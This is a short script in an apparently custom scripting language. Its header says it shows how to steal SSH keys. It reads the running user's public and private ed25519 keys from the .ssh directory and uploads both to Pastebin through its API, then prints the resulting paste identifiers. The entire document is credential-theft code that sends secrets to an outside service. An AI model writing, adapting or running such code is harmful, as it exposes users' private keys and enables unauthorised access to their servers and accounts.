@ This scripts purpose is to showcase how you can steal ssh keys and paste them to pastebin

[version 1.1]

main:{
    system.read_file("/home/€666/.ssh/id_ed25519.pub"); @ Grabs the running users public key
    system.read_file("/home/€666/.ssh/id_ed25519"); @ Grabs the running users private key

    @ Pastebin API
    #paste.set.username("<username>");
    #paste.set.password("<password>");
    #paste.set.token("<token>");
    #paste.set.titel("SSH Key");
    
    #paste.set.key("true"); @ Will return and save the key in a runtime variable

    #paste.set.content("€1"); @ Post the public key
    #paste.paste();
    system.out("Key: €3");

    #paste.set.content("€2"); @ Post the private key
    #paste.paste();
    system.out("Key: €4");

    system.exit("0");
}